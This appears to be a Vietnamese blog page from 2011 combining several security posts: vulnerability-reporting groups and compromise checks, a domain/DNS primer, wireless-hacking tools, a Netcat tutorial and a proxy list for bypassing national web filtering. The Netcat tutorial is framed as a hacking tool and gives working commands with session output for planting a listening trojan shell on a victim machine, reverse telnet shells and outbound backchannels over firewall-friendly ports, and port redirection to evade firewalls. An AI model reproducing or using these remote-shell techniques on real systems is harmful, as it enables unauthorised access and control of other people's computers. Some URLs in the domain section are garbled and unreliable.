Thứ Năm, 27 tháng 1, 2011

Ảnh hưởng của các lỗ hổng bảo mật trên internet


Tuy nhiên, có phải bất kỳ lỗ hổng bảo mật nào cùng nguy hiểm đến hệ thống hay không? Có rất nhiều thông báo liên quan đến lỗ hổng bảo mật trên mạng Internet, hầu hết trong số đó là các lỗ hổng loại C, và không đặc biệt nguy hiểm đối với hệ thống. Ví dụ, khi những lỗ hổng về sendmail được thông báo trên mạng, không phải ngay lập tức ảnh hưởng trên toàn bộ hệ thống. Khi những thông báo về lỗ hổng được khẳng định chắc chắn, các nhóm tin sẽ đưa ra một số phương pháp để khắc phục hệ thống.
Trên mạng Internet có một số nhóm tin thường thảo luận về các chủ đề liên quan đến các lỗ hổng bảo mật đó là:

- CERT (Computer Emergency Reponse Team): Nhóm tin này hình thành sau khi có phương thức tấn công Worm xuất hiện trên mạng Internet. Nhóm tin này thường thông báo và đưa ra các trợ giúp liên quan đến các lỗ hổng bảo mật. Ngoài ra nhóm tin còn có những báo cáo thường niên để khuyến nghị người quản trị mạng về các vấn đề liên quan đến bảo mật hệ thống. Địa chỉ Web site của nhóm tin: http://www.cert.org

- CIAC (Department of Energy Computer Incident Advisory Capability): tổ chức này xây dựng một cơ sở dữ liệu liên quan đến bảo mật cho bộ năng lượng của Mỹ. Thông tin của CIAC được đánh giá là một kho dữ liệu đầy đủ nhất về các vấn đề liên quan đến bảo mật hệ thống. Địa chỉ web site của CIAC : http://ciac.llnl.org

- FIRST (The Forum of Incident Response and Security Teams): Đây là một diễn đàn liên kết nhiều tổ chức xã hội và tư nhân, làm việc tình nguyện để giải quyết các vấn đề về an ninh của mạng Internet. Địa chỉ Web site của FIRST: http://www.first.org. Một số thành viên của FIRST gồm:

- CIAC

- NASA Automated Systems Incident Response Capability.

- Purdue University Computer Emergency Response Team

- Stanford University Security Team

- IBM Emergency Response Team

CÁC BIỆN PHÁP PHÁT HIỆN HỆ THỐNG BỊ TẤN CÔNG:

Không có một hệ thống nào có thể đảm bảo an toàn tuyệt đối; bản thân mỗi dịch vụ đều có những lỗ hổng bảo mật tiềm tàng. Đứng trên góc độ người quản trị hệ thống, ngoài việc tìm hiểu phát hiện những lỗ hổng bảo mật còn luôn phải thực hiện các biện pháp kiểm tra hệ thống xem có dấu hiệu tấn công hay không. Các biện pháp đó là:


- Kiểm tra các dấu hiệu hệ thống bị tấn công: hệ thống thường bị treo hoặc bị crash bằng những thông báo lỗi không rõ ràng. Khó xác định nguyên nhân do thiếu thông tin liên quan. Trước tiên, xác định các nguyên nhân về phần cứng hay không, nếu không phải phần cứng hãy nghĩ đến khả năng máy bị tấn công


- Kiểm tra các tài khoản người dùng mới trên hệ thống: một số tài khoản lạ, nhất là uid của tài khoản đó = 0


- Kiểm tra xuất hiện các tập tin lạ. Thường phát hiện thông qua cách đặt tên các tệp tin, mỗi người quản trị hệ thống nên có thói quen đặt tên tập tin theo một mẫu nhất định để dễ dàng phát hiện tập tin lạ. Dùng các lệnh ls -l để kiểm tra thuộc tính setuid và setgid đối với những tập tinh đáng chú ý (đặc biệt là các tập tin scripts).


- Kiểm tra thời gian thay đổi trên hệ thống, đặc biệt là các chương trình login, sh hoặc các scripts khởi động trong /etc/init.d, /etc/rc.d ...


- Kiểm tra hiệu năng của hệ thống. Sử dụng các tiện ích theo dõi tài nguyên và các tiến trình đang hoạt động trên hệ thống như ps hoặc top ...


- Kiểm tra hoạt động của các dịch vụ mà hệ thống cung cấp. Chúng ta đã biết rằng một trong các mục đích tấn công là làm cho tê liệt hệ thống (Hình thức tấn công DoS). Sử dụng các lệnh như ps, pstat, các tiện ích về mạng để phát hiện nguyên nhân trên hệ thống.


- Kiểm tra truy nhập hệ thống bằng các account thông thường, đề phòng trường hợp các account này bị truy nhập trái phép và thay đổi quyền hạn mà người sử dụng hợp pháp không kiểm sóat được.


- Kiểm tra các file liên quan đến cấu hình mạng và dịch vụ như /etc/inetd.conf; bỏ các dịch vụ không cần thiết; đối với những dịch vụ không cần thiết chạy dưới quyền root thì không chạy bằng các quyền yếu hơn.


- Kiểm tra các phiên bản của sendmail, /bin/mail, ftp; tham gia các nhóm tin về bảo mật để có thông tin về lỗ hổng của dịch vụ sử dụng


Các biện pháp này kết hợp với nhau tạo nên một chính sách về bảo mật đối với hệ thống.


Tìm Hiểu về Domain


1. Domain name là gì?
Máy tính có thể làm việc rất tốt với những con số nhưng con người thì không. Khi cần kết nối với một thiết bị trên mạng thì bạn chỉ cần đánh IP của thiết bị đó. Điều này hiển nhiên là rất rắc rối và khó nhớ, vì vậy tên miền (domain) được tạo ra.Giống như file, tên miền cũng có đuôi, chúng có ý nghĩa như sau:
.COM: thương mại, công ty hoặc bất kỳ người nào.
.EDU: giáo dục, thường là các trường đại học hoặc trường học.
.MIL: quân sự.
.GOV: chính phủ.
.ORG: các tổi chức, thường là các tổ chức hoạt động phi thương mại. Tuy nhiên mọi người cũng có thể xó domain này.
.CH,.DE,.VN...: Tuỳ thuộc vào quốc gia đã đăng ký theo tiêu chuẩn thế giới. Bạn có thể tham khảo thêm tại đây.
Một vài trang web có thể có 2 phần mở rộng là .COM.VN
Tên miền được đưa ra bởi Internic và bạn phải mua nó.
Ví dụ nếu bạn muốn có một web site có tên http://k.domaindlx.com/clairsang/www.camauonline.com/default.htm thì bạn phải trả tiền cho Internic để có được site này. Sau đó bạn không cần phải trả tiền cho các domain như tungxeng.tools.com....Khi đánh một tên miền thì sẽ có một server là DNS (Domain Server Name) tìm kiếm trong bảng tham chiếu xem số IP tương ứng là gì. Nếu không tìm được, nó sẽ tìm ở một DSN khác! Cùng một IP, có thể có nhiều tên miền khác nhau và điều này thường xảy ra.
Ví dụ: nếu ISP của bạn là vnn.com và web site của bạn là http:// www.vnn.com/thuongmai thì bạn có trả tiền cho tên miền thuongmai.com và mọi người có thể truy cập vào site của bạn bằng
http://k.domaindlx.com/clairsang/www.www.thuongmai.com/default.htm và tất nhiên là http://k.domaindlx.com/clairsang/www.vnn.com/thuongmai vẫn tồn tại. Dấu " / " chỉ ra thư mục mà lưu trữ trang web trên server.
2. Domain có thể nói lên điều gì:
Khi bạn kết nối với ISP, bạn sẽ có một IP và IP này sẽ có một tên miền.
Ví dụ: ISP của bạn là tungxeng.com thì bạn có thể có tên miền là tools.server1.tungxeng.com và mọi người có thể biết ISP của bạn là ai và quốc tịch của bạn là gì.
3. Đổi tên miền như thế nào:
Có thể đăng ký một tên mới, mua một IP cố định hoặc đổi ISP. Bảng tham chiếu DNS được tạo ra từ yêu cầu của DNS chứa tên miền. Ví dụ nếu bạn sở hữu "tungxeng.com" DNS server sẽ gởi yêu cầu đến DNS server của bạn về "ten.tungxeng.com". Bảng tham chiếu này không thể bị sữa chữa trừ khi bạn có toàn quyền truy cập vào DNS server. Nhưng không có một bảng tham chiếu nào có đầy đủ tất cả các tên miền. Vì vậy khi nó không tìm được tên miền thì nó sẽ gởi yêu cầu đến một DNS khác.
Để tăng tốc độ xử lí, DNS còn có một bộ nhớ cache. Khi có nhiều người cùng yêu cầu một tên miền, thì DNS server sẽ tìm trong cache trước. Nếu bạn gởi thông tin giả đến DNS cache và người khác cùng đến một địa chỉ họ cũng sẽ nhận được thông tin giả mạo đó

( Những tên tôi nêu trên chỉ với tích chất tham khảo , nếu bạn muốn biết rõ hơn bạn hãy vào trang www.google.com mà tìm , bạn sẽ được kết quả cụ thể ) .        

Mạng không dây và các vấn đề an ninh


Tóm tắt nội dung

• Kỹ thuật mạng không dây WLAN

• Những vấn đề an ninh của mạng không dây

• Một số công cụ hacking mạng không dây

• Các biện pháp bảo vệ và phát hiện thâm nhập

Kỹ thuật mạng không dây WLAN

• Mạng không dây WLAN hiện nay dựa trên nền tảng các tiêu chuẩn IEEE 802.11:

– Hoạt động trên các tấn số 2.4 và 5 Ghz thuộc dải tần số giành cho công nghiệp, khoa học và Y tế (ISM).

– Tốc độ từ 1 Mb/s đến 54 Mb/s

Kỹ thuật mạng không dây WLAN



• IEEE 802.11 quy định các tiêu chuẩn về tín hiệu và giao thức nhằm đảm bảo tính tương thích cho các thiết bị mạng không dây.

• Nhờ IEEE 802.11, sự ứng dụng của WLAN đã có bước phát triển nhảy vọt trong 3 năm gần đây.


Một số ưu điểm của mạng không dây WLAN



• Không phải khoan tường, bấm và đi dây.

• Không phải ngồi tại những vị trí cố định.

• Trong nhiều trường hợp là giải pháp rẻ hơn cho mạng LAN

• Có thể kết nối ở khoảng cách xa hơn so với các thiết bị blue tooth hoặc IR.

• Công suất và tốc độ có thể chấp nhận được…..


Nhược điểm của mạng không dây



• Phức tạp hơn trong việc thiết lập, quản lý và vận hành mạng.

• Thông tin được truyền trên không trung trên tần số dùng chung dẫn đến các vấn đề an ninh và nhiễu.

• Tần số càng cao thì tốc độ càng cao, nhưng đồng thời độ suy giảm cũng càng cao...


Các mô hình WLAN



• Mô hình infrastructure: ABCDEF kết nối thông qua AP

• Extended Service Set (ESS)

• A - - - | - ------- Access Point (AP)------- | - - - D

• B - - - | | - - - E

• C - - - | | - - - F

• Mô hình ad-hoc: ABCD kết nối với nhau trực tiếp

• A - - - C

• | \ / |

• | /\ |

• | / \ |

• B - - - D


Những vấn đề an ninh của mạng không dây



• Nhận thức của người dùng:

– Kỹ thuật mới, hiện đại, ít người am hiểu tường tận.

– Quan điểm chủ quan (quá phức tạp chắc không ai biết)

– Cấu hình mặc định của các thiết bị thường ở chế độ mở hoàn toàn.

• Các lỗ hổng bảo mật:

– WEP (wired equivalent protocol) không an toàn

– MAC filtering không hiệu quả vì MAC có thể bị thay đổi


Lỗ hổng bảo mật WEP



• Wired Equivalent Protcol (WEP) là một bộ phận bảo mật của chuẩn IEEE 802.11.

• WEP sử dụng 64 hoặc 128 bits keys để mã hoá data ở mức link-layer dựa trên thuật toán RC4, trong đó 24 bits được dùng cho Initialization Vector (IV).


Lỗ hổng bảo mật WEP



• Do nhược điểm của việc ứng dụng IV và RC4 trong chuẩn 802.11, khoá WEP có thể bị bẻ gãy trong khoảng thời gian tính bằng phút với một may tính thông thường.



MAC spoofing



• Phần lớn các Access Point đều sử dụng danh sách địa chỉ MAC như là một phương tiện bảo mật.

• Người dùng thông thường tưởng rằng mình đã được bảo vệ khi ứng dụng cơ chế hạn chế địa chỉ MAC.

• Tuy nhiên địa chỉ MAC có thể bị thay đổi chỉ với một câu lệnh


Một số công cụ hacking WLAN



• Netstumbler:

– Là công cụ dùng để thu thập thông tin của các AP

– Chạy trên Windows

– Tính năng GPS plug-in cho phép xác định toạ độ của các AP.

– Thu thập tín hiệu một cách chủ động (cách gửi yêu cầu lên không trung và đợi trả lời) nên có thể bị phát hiện.

– Có thể cung cấp các thông tin về AP như MAC, nhà sản xuất, SSID, biện pháp bảo mật, kênh tần số, vv.


Một số công cụ hacking WLAN



• Airsnort:

– Là công cụ được xây dựng nhằm mục đích chứng minh độ an toàn thấp của WEP.

– Chạy trên Linux.

– Bắt tín hiệu trong không gian một cách thụ động nên không bị phát hiện.

– Khi thu thập đủ số liệu, Airsnort có thể tự động bẻ khoá và hiển thị mật khẩu trên màn hình.


Một số công cụ hacking WLAN



• Kismet:

– Cũng là một công cụ dùng để bẻ khoá WEP

– Chạy trên Linux, openBSD, Cygwin, MacOS X

– Nhiều tính năng hơn Airsnort:

• Phát hiện được các IP block

• Log file tương thích với các công cụ khác như Ethereal, Tcpdump hay Airsnort.

• Phát hiện được cả các SSID ẩn

• Phát hiện được nhà sản xuất AP


Các biện pháp bảo mật cho WLAN


• Thay đổi ngay các giá trị mặc định của thiết bị trước khi đưa vào sử dụng.

• Đặt AP ở vị trí hợp lý sao cho người dùng có được tín hiệu tốt nhất và hạn chế được tín hiệu ra bên ngoài.


Các biện pháp bảo mật cho WLAN



• Tránh sử dụng AP trên cùng kênh với các AP khác.

• Áp dụng tất cả các biện pháp bảo mật của thiết bị mà nhà sản xuất cung cấp.

• Luôn cập nhật các phiên bản firmware mới nhất.

• Dùng Virtual Private Network (VPN)  

Hướng dẫn sử dụng Netcat


1. Giới thiệu
Netcat là một công cụ không thể thiếu được nếu bạn muốn hack một website nào đó. Vì vậy bạn cần biết một chút về Netcat.
2. Biên dịch
Đối với bản Netcat cho Linux, bạn phải biên dịch nó trước khi sử dụng.
- hiệu chỉnh file netcat.c bằng vi: vi netcat.c
 + tìm dòng res_init(); trong main() và thêm vào trước 2 dấu "/": // res_init();
 + thêm 2 dòng sau vào phần #define (nằm ở đầu file):
     #define GAPING_SECURITY_HOLE
     #define TELNET
- biên dịch: make linux
- chạy thử: ./nc -h
- nếu bạn muốn chạy Netcat bằng nc thay cho ./nc, bạn chỉ cần hiệu chỉnh lại biến môi trường PATH trong file ~/.bashrc, thêm vào ":."
  PATH=/sbin:/usr/sbin:...:.
Bản Netcat cho Win không cần phải compile vì đã có sẵn file nhị phân nc.exe. Chỉ vậy giải nén và chạy là xong.
3. Các tùy chọn của Netcat
Netcat chạy ở chế độ dòng lệnh. Bạn chạy nc -h để biết các tham số:
C:\>nc -h
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [options] [hostname] [port]
options:
        -d              detach from console, stealth mode

        -e prog         inbound program to exec [dangerous!!]
        -g gateway      source-routing hop point[s], up to 8
        -G num          source-routing pointer: 4, 8, 12, ...
        -h              this cruft
        -i secs         delay interval for lines sent, ports scanned
        -l              listen mode, for inbound connects
        -L              listen harder, re-listen on socket close
        -n              numeric-only IP addresses, no DNS
        -o file         hex dump of traffic
        -p port         local port number
        -r              randomize local and remote ports
        -s addr         local source address
        -t              answer TELNET negotiation
        -u              UDP mode
        -v              verbose [use twice to be more verbose]
        -w secs         timeout for connects and final net reads
        -z              zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]
* Cú pháp:
- chế độ kết nối    : nc [-tùy_chọn] tên_máy cổng1[-cổng2]
- chế độ lắng nghe: nc -l -p cổng [-tùy_chọn] [tên_máy] [cổng]
* Một số tùy chọn:
-d tách Netcat khỏi cửa sổ lệnh hay là console, Netcat sẽ chạy ở chế độ steath(không hiển thị trên thanh Taskbar)
-e prog thi hành chương trình prog, thường dùng trong chế độ lắng nghe
-h gọi hướng dẫn
-i secs trì hoãn secs mili giây trước khi gởi một dòng dữ liệu đi
-l đặt Netcat vào chế độ lắng nghe để chờ các kết nối đến
-L buộc Netcat "cố" lắng nghe. Nó sẽ lắng nghe trở lại sau mỗi khi ngắt một kết nối.
-n chỉ dùng địa chỉ IP ở dạng số, chẳng hạn như 192.168.16.7, Netcat sẽ không thẩm vấn DNS
-o file ghi nhật kí vào file
-p port chỉ định cổng port
-r yêu cầu Netcat chọn cổng ngẫu nhiên(random)
-s addr giả mạo địa chỉ IP nguồn là addr
-t không gởi các thông tin phụ đi trong một phiên telnet. Khi bạn telnet đến một telnet daemon(telnetd), telnetd thường yêu cầu trình telnet client của bạn gởi đến các thông tin phụ như biến môi trường TERM, USER. Nếu bạn sử dụng netcat với tùy chọn -t để telnet, netcat sẽ không gởi các thông tin này đến telnetd.
-u dùng UDP(mặc định netcat dùng TCP)
-v hiển thị chi tiết các thông tin về kết nối hiện tại. -vv sẽ hiển thị thông tin chi tiết hơn nữa.
-w secs đặt thời gian timeout cho mỗi kết nối là secs mili giây
-z chế độ zero I/O, thường được sử dụng khi scan port
Netcat hổ trợ phạm vi cho số hiệu cổng. Cú pháp là cổng1-cổng2. Ví dụ: 1-8080 nghĩa là 1,2,3,..,8080
4. Các ví dụ:
4.1 Chộp banner của web server
Ví dụ: nc đến 172.16.84.2, cổng 80
C:\>nc 172.16.84.2 80
HEAD / HTTP/1.0 (tại đây bạn gõ Enter 2 lần)

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2000 20:51:37 GMT
Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2
 OpenSSL/0.9.6 PHP/4.0.4pl1
Connection: close
Content-Type: text/html
Để biết thông tin chi tiết về kết nối, bạn có thể dùng -v(-vv sẽ cho biết các thông tin chi tiết hơn nữa)
C:\>nc -vv 172.16.84.1 80
172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [172.16.84.1] 80 (?) open
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2000 14:46:43 GMT
Server: Apache/1.3.20 (Win32)
Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT
ETag: "0-cec-3899eaea"
Accept-Ranges: bytes
Content-Length: 3308
Connection: close
Content-Type: text/html

sent 17, rcvd 245: NOTSOCK
Nếu muốn ghi nhật kí, hãy dùng -o <tên_file>. Ví dụ:
nc -vv -o nhat_ki.log 172.16.84.2 80
- xem file nhat_ki.log
< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.
< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F
< 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54
< 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 #  GMT..Server: Ap
< 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win
< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi
< 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb
< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM
< 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: "0-cec-
< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea"..Accep
< 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.
< 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:
< 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f #  3308..Connectio
< 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten
< 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm
< 000000f0 6c 0d 0a 0d 0a                                  # l....
dấu < nghĩa là server gởi đến netcat
dấu > nghĩa là netcat gởi đến server
4.2 Quét cổng
- chạy netcat với tùy chọn -z. Để quét cổng nhanh hơn, hãy dùng -n vì netcat sẽ không cần thấm vấn DNS. Ví dụ để scan các cổng TCP(1->500) của host 172.16.106.1
[dt@vicki /]# nc -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 443 (?) open
(UNKNOWN) [172.16.106.1] 139 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open
(UNKNOWN) [172.16.106.1] 80 (?) open
(UNKNOWN) [172.16.106.1] 23 (?) open
- nếu bạn cần scan các cổng UDP, dùng -u
[dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 1025 (?) open
(UNKNOWN) [172.16.106.1] 1024 (?) open
(UNKNOWN) [172.16.106.1] 138 (?) open
(UNKNOWN) [172.16.106.1] 137 (?) open
(UNKNOWN) [172.16.106.1] 123 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open
4.3 Biến Netcat thành một trojan
- trên máy tính của nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn -l(listen) và -p port để xác định số hiệu cổng cần lắng nghe, -e <tên_chương_trình_cần_chạy> để yêu cầu netcat thi hành 1 chương trình khi có 1 kết nối đến, thường là shell lệnh cmd.exe(đối với NT) hoặc /bin/sh(đối với Unix). Ví dụ:
E:\>nc -nvv -l -p 8080 -e cmd.exe
listening on [any] 8080 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159
 sent 0, rcvd 0: unknown socket error
- trên máy tính dùng để tấn công, bạn chỉ việc dùng netcat nối đến máy nạn nhân trên cổng đã định, chẳng hạn như 8080
C:\>nc -nvv 172.16.84.2 8080
(UNKNOWN) [172.16.84.2] 8080 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

E:\>cd test
cd test

E:\test>dir /w
dir /w
 Volume in drive E has no label.
 Volume Serial Number is B465-452F

 Directory of E:\test

[.]            [..]           head.log       NETUSERS.EXE   NetView.exe
ntcrash.zip    password.txt   pwdump.exe
               6 File(s)        262,499 bytes
               2 Dir(s)     191,488,000 bytes free

C:\test>exit
exit
sent 20, rcvd 450: NOTSOCK
Như bạn thấy, chúng ta đã có thể làm gì mà chẳng được với máy của nạn nhân qua shell lệnh này?! Tuy nhiên, sau kết nối trên, netcat trên máy nạn nhân cũng đóng luôn. Để yêu cầu netcat lắng nghe trở lại sau mỗi kết nối, bạn dùng -L thay cho -l. Lưu ý: -L chỉ có thể áp dụng cho bản Netcat for Windows, không áp dụng cho bản chạy trên Linux.
E:\>nc -nvv -L -p 8080 -e cmd.exe
listening on [any] 8080 ...
- Riêng đối với Netcat cho Win, bạn có thể lắng nghe ngay trên cổng đang lắng nghe. Chỉ cần chỉ định địa chỉ nguồn là -s <địa_chỉ_ip_của_máy_này>. Ví dụ:
netstat -a
...
TCP    nan_nhan:domain              nan_nhan:0                   LISTENING <- cổng 53 đang lắng nghe
...

E:\>nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 -> lắng nghe ngay trên cổng 53
listening on [172.16.84.1] 53 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163
- Trên Windows NT, để đặt Netcat ở chế độ lắng nghe, không cần phải có quyền Administrator, chỉ cần login vào với 1 username bình thường khởi động Netcat là xong.
- Chú ý: bạn không thể chạy netcat với ... -u -e cmd.exe... hoặc ...-u -e /bin/sh... netcat sẽ không làm việc đúng. Nếu bạn muốn có một UDP shell trên Unix, hãy dùng udpshell thay cho netcat.
5. Kĩ thuật tiên tiến
5.1 Telnet nghịch chuuyển
- dùng telnet để nối cửa số netcat đang lắng nghe, kế đó đưa lệnh từ cửa sổ này vào luồng telnet nghịch chuyển, và gởi kết quả vào cửa sổ kia. Ví dụ:
- trên máy dùng để tấn công(172.16.84.1), mở 2 cửa sổ netcat lần lượt lắng nghe trên cổng 80 và 25:
+ cửa sổ Netcat (1)
C:\>nc -nvv -l -p 80
listennng on [any] 80 ...
connect to [172.16.84.1] from <UNKNOWN> [172.16.84.2] 1055
pwd
ls -la
_
 + cửa sổ Netcat (2)
C:\>nc -nvv -l -p 25
listening on [any] 25 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.2] 1056
/
total 171
drwxr-xr-x   17 root     root         4096 Feb  5 16:15 .
drwxr-xr-x   17 root     root         4096 Feb  5 16:15 ..
drwxr-xr-x    2 root     root         4096 Feb  5 08:55 b ( ²?n
drwxr-xr-x    3 root     root         4096 Feb  5 14:19 boot
drwxr-xr-x   13 root     root       106496 Feb  5 14:18 dev
drwxr-xr-x   37 root     root         4096 Feb  5 14:23 et = ²?
drwxr-xr-x    6 root     root         4096 Feb  5 08:58 home
drwxr-xr-x    6 root     root         4096 Feb  5 08:50 l ( ²?b
drwxr-xr-x    2 root     root         7168 De = ²? 31  1969 mnt
drwxr-xr-x    4 root     root         4096 Feb  5 16:18 n = ²?
drwxr-xr-x    2 root     root         4096 Aug 23 12:03 opt
dr-xr-xr-x   61 root     root            0 Feb  5 09:18 pro = ²?
drwx------   12 root     root         4096 Feb  5 16:24 root
drwxr-xr-x    2 root     root         4096 Feb  5 08:55 sb ( ²?n
drwxrwxrwt    9 root     root         4096 Feb  5 16:25 tmp
drwxr-xr-x   13 root     root         4096 Feb  5 08:42 usr
drwxr-xr-x   18 root     root         4096 Feb  5 08:52 var
- trên máy tính nạn nhân(172.16.84.2), telnet nghịch chuyển đến máy dùng để tấn công(172.16.84.1), dùng /bin/sh để kết xuất: 
[root@nan_nhan /]# telnet 172.16.84.1 80 | /bin/sh | telnet 172.16.84.1 25
/bin/sh: Trying: command not found
/bin/sh: Connected: command not found
/bin/sh: Escape: command not found
Trying 172.16.84.1...
Connected to 172.16.84.1.
Escape character is '^]'.
_
Telnet trên máy nạn nhân sẽ chuyển tất cả những gì mà chúng ta gõ vào trong cửa sổ Netcat (1) - cổng 80 kết xuất sang cho /bin/sh thi hành. Kết quả của /bin/sh được kết xuất trở lại cho máy tính dùng để tấn công trên cửa sổ Netcat (2) - cổng 25. Nhiệm vụ của bạn là chỉ cần gõ lệnh vào cửa sổ Netcat (1) và xem kết quả trong cửa sổ Netcat (2).
Sở dĩ tôi chọn cổng 80 và 25 vì các cổng này thường không bị firewalls hoặc filters lọc.
5.2 Tạo kênh sau
Cũng tương tự như telnet nghịch chuyển.
- trên máy tính dùng để tấn công, bạn đặt Netcat lắng nghe trên cổng 80 vì cổng này sẽ không bị firewall chặn:
C:\>nc -nvv -l -p 80
listennng on [any] 80 ...
- tiếp theo, từ shell lệnh của máy nạn nhân, bạn nối Netcat đến máy dùng để tấn công với tùy chọn -e để đổ shell:
E:\>nc -e cmd.exe 172.16.84.1 80
Một khi máy nạn nhân thi hành chuổi lệnh trên, kênh sau nc sẽ được tạo, "nhét" shell (trong trường hợp này là cmd.exe) trở vào nc. Kể từ đây, chúng ta đã có 1 shell lệnh ảo.
C:\>nc -nvv -l -p 80
listenning pm [any] 80 ...
connect to [172.16.84.1] from [UNKNOWN] [172.16.84.3] 1035

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

E:\>
5.3 Đổi hướng cổng
Bạn có thể dùng tunnel.pl hoặc fpipe.exe. Hãy xem ví dụ sau:
- chạy nc trên cổng bất kì:
E:\>nc -nvv -L -p 1234 -e cmd.exe
listening on [any] 1234 ...
- chạy tunnel hoặc fpipe để đổi hướng cổng
C:\>perl tunnel.pl --port=53 --tohost=127.0.0.1 --toport=1234
C:\>fpipe -l 53 -r 1234 127.0.0.1
tunnel, fpipe sẽ lắng nghe trên cổng 53, sau đó chuyển tiếp kết nối đến 127.0.0.1:1024, đây là cổng mà netcat đang lắng nghe.
Đổi hướng cổng là một cách để đi vòng qua firewalls.

Vượt tường lửa

    Theo thông tin cắt nhặt được thì hiện nay Việt Nam chúng ta cùng với 21 nước nữa trên thế giới dùng cái Tường lửa (firewall) để quản lý Văn hoá trên mạng Internet tại mỗi nước theo quan điểm khác nhau.
   Ở Việt Nam chúng ta thì tất cả mọi con đường của Internet đến với bạn dù bất cứ đâu trên toàn lãnh thổ đều phải qua một trạm kiểm soát Văn hoá này nó được gọi là Proxy và được đặt ngay tại Thủ đô Hà Nội của chúng ta và tôi cũng không rõ nó nằm ở đâu. Nó hoạt động cũng khá hay là bất cứ một trang Web nào được bạn duyệt trên máy tính của bạn thì trước hết nó phải được kiểm duyệt ở cái Proxy này và nếu nó thuộc trong danh sách cấm không được vào thì bạn có vào mãi thì cũng thế thôi .Nó thuộc danh sách cấm tức là nó bị chặn tường lửa rồi đó. Khi bị chặn tường lửa thì bạn cứ tưởng cái trang Web của bạn đang vào là không tồn tại vì nó cứ báo là "The page cannot be displayed" vv.. tức là có ý là : Nó không tìm thấy hay không tồn tại. Nhưng thực ra nó vẫn cứ sờ sờ tồn tại trên mạng mới chít chứ hic hic .Nếu bạn tin là nó không tồn tại thì hãy mail sang bên Lào cho anh bạn nào đó hỏi xem anh ấy có vào được không nha .
Và bây giờ bạn cùng tôi trèo qua tường xem có được không nhé !
1. Nếu bạn vào net ở nhà thì bạn mở IE lên rồi vào tool -> internet Option -> connections -> setting đánh dấu 2 mục ở proxy server. Chỗ address và port bạn điền vào những thứ này tùy ý bạn chọn
68.202.81
138.81.11.3
144.92.104.66
210.99.199.227
ws13.lumedia.fi:80
218.65.110.14:80
218.145.25.47:80
211.233.80.64:80
211.233.80.22:80
211.233.27.189:80
203.113.34.239:80
24.41.27.57
170.224.224.37
217.172.180.178
210.146.44.245
63.100.18.2:80
63.193.207.2:80
nfdh.org:80
ftp.aparizona.com:80
tmc01.tmcgroup.com:80
124.125.252.64.snet.net:80
dns.urkraft.se:80
ns.dainichi-el.co.jp:80
206.105.71.2:80
216.235.32.126:80
ns.cyberlinks-jp.com:80
210.163.167.162:80
64.5.220.82:80
204.196.104.27:80
211.20.195.43:80
internet-server.ebf.com.br:80
211.100.0.34:80
61.142.169.98:80
163.29.140.66:80
ns.proserv.co.jp:80
207.225.63.2:80
sv1.ura.co.jp:80
www.jps-print.com:80
www.nisshin-syouji.co.jp:80
ns.itac-ao.co.jp:80
210.255.65.2:80
gauntlet1.huntlas.co.za:80
srv-2tee-lamias.fth.sch.gr:80
210.175.125.34:80
www.qdh.or.jp:80
mail1.found.co.jp:80
sdsl-64-7-12-211.dsl.chi.megapath.net:80
ns.tew-j.com:80
211.20.154.178:80
pbc.edu.gd:80
210.74.254.35:80
210.176.230.29:80
202.39.21.122:80
ns.factornet.co.jp:80
212.150.12.21:80
212.150.215.4:80
212.154.175.227:80
212.155.109.161:80
TK212017066196.teleweb.at:80
chello212017083078.11.vie.surfer.at:80
mail.buehlermotor.com.mx:80
212.187.53.133:80
www.davidblowers.co.uk:80
wireless-067-159.tele2.co.uk:80
wireless-069-070.tele2.co.uk:80
212.204.48.210:80
các proxy này dùng port 80
xong rồi OK thế là trèo vô tư như khỉ vậy
2. Nếu bạn vào net ở ngoài dịch vụ thì bạn vào mở IE lên rồi vào tool -> internet Option -> connections ->LAN setting đánh dấu chọn 2 ô ở proxy server rồi nhập proxy và port vào thế là trèo vô tư.
